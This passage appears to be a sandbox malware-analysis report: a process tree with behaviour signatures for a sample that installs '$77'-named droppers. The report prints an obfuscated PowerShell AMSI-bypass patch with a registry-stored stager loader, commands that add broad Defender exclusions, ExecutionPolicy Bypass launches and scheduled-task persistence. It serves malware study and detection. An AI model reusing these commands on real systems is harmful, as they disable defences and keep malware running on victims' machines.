@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$STHpTQwLTtx=$SOLEIKFQZXgwM.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$EgplVwdjjlhhRv=$MElQLZKbqvseXf.Invoke($Null,@([Object]$STHpTQwLTtx,[Object]('Load'+'LibraryA')));$gaBnDzHwGeirGKgRz=$MElQLZKbqvseXf.Invoke($Null,@([Object]$STHpTQwLTtx,[Object]('Vir'+'tual'+'Pro'+'tect')));$xiMcSoR=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EgplVwdjjlhhRv,$bZRCETSSixQSxuhIYAS).Invoke('a'+'m'+'si.dll');$qbbeLlIKyRmGLYkjg=$MElQLZKbqvseXf.Invoke($Null,@([Object]$xiMcSoR,[Object]('Ams'+'iSc'+'an'+'Buffer')));$gzGhcLYPUy=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gaBnDzHwGeirGKgRz,$vYhXwZNtzAbneOwUOxJaqO).Invoke($qbbeLlIKyRmGLYkjg,[uint32]8,4,[ref]$gzGhcLYPUy);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$qbbeLlIKyRmGLYkjg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gaBnDzHwGeirGKgRz,$vYhXwZNtzAbneOwUOxJaqO).Invoke($qbbeLlIKyRmGLYkjg,[uint32]8,0x20,[ref]$gzGhcLYPUy);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('$77stager')).EntryPoint.Invoke($Null,$Null)"
    PID: 4292
    Signatures:
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\Conhost.exe
      Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      PID: 3752
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1188
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1044
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1224
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1308
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1324
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2332
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1344
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1436
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1556
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1628
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s FontCache1⤵PID:1644
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1676
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1904
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1912
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1972
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:1844
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3144
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3500
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4480
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4480 -s 3562⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2168
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵PID:4488
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:4656
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe1⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
PID:4144
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:4252
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:872
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:1792
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:4296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3864
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4988
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3836
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3340
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3340 -s 9002⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3096
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3052 -
C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe"C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe"2⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2328 -
C:\Users\Admin\AppData\Local\Temp\BDD2412C4CB1952748237E6CC32BB3D39A68CB4E1ED3E.exe"{path}"3⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-update" /tr '"C:\Users\Admin\AppData\Roaming\$77-update.exe"' & exit4⤵
- Suspicious use of WriteProcessMemory
PID:4312 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "$77-update" /tr '"C:\Users\Admin\AppData\Roaming\$77-update.exe"'5⤵
- Creates scheduled task(s)
PID:1116
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp95A8.tmp.bat""4⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Windows\SysWOW64\timeout.exetimeout 35⤵
- Delays execution with timeout.exe
PID:3784
-
-
C:\Users\Admin\AppData\Roaming\$77-update.exe"C:\Users\Admin\AppData\Roaming\$77-update.exe"5⤵
- Looks for VirtualBox Guest Additions in registry
- Executes dropped EXE
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4320 -
C:\Users\Admin\AppData\Roaming\$77-update.exe"{path}"6⤵
- Executes dropped EXE
PID:5012
-
-
C:\Users\Admin\AppData\Roaming\$77-update.exe"{path}"6⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3808 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension @('exe','dll') -Force7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3456
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\qzkzzp.exe"' & exit7⤵
- Suspicious use of WriteProcessMemory
PID:1668 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\qzkzzp.exe"'8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2080 -
C:\Users\Admin\AppData\Local\Temp\qzkzzp.exe"C:\Users\Admin\AppData\Local\Temp\qzkzzp.exe"9⤵
- Executes dropped EXE
PID:3180
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\lsnupy.exe"' & exit7⤵PID:3792
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:3464
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\lsnupy.exe"'8⤵
- Suspicious use of AdjustPrivilegeToken
PID:4080 -
C:\Users\Admin\AppData\Local\Temp\lsnupy.exe"C:\Users\Admin\AppData\Local\Temp\lsnupy.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3092 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:2896
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\sjtjny.exe"' & exit7⤵PID:400
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:1096
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\sjtjny.exe"'8⤵
- Suspicious use of AdjustPrivilegeToken
PID:3628 -
C:\Users\Admin\AppData\Local\Temp\sjtjny.exe"C:\Users\Admin\AppData\Local\Temp\sjtjny.exe"9⤵
- Executes dropped EXE
- Drops startup file
PID:4288
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jiyrgq.exe"' & exit7⤵PID:1448
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:4844
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\jiyrgq.exe"'8⤵PID:4052
-
C:\Users\Admin\AppData\Local\Temp\jiyrgq.exe"C:\Users\Admin\AppData\Local\Temp\jiyrgq.exe"9⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4484 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "$77Client" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\jiyrgq.exe" /rl HIGHEST /f10⤵
- Creates scheduled task(s)
PID:832 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵PID:4700
-
-
-
C:\Windows\system32\$77win\$77Client.exe"C:\Windows\system32\$77win\$77Client.exe"10⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4880 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "$77Client" /sc ONLOGON /tr "C:\Windows\system32\$77win\$77Client.exe" /rl HIGHEST /f11⤵
- Creates scheduled task(s)
PID:2164 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵PID:2040
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2752
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2732
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2716
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2656
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:2648
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2512
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2348
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2204
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2112
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1780
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1368
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵PID:4012
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:4592
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵PID:3156
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:1852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:1788
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:2916 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 456 -p 3340 -ip 33402⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4792
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 448 -p 4480 -ip 44802⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4780
-
Downloads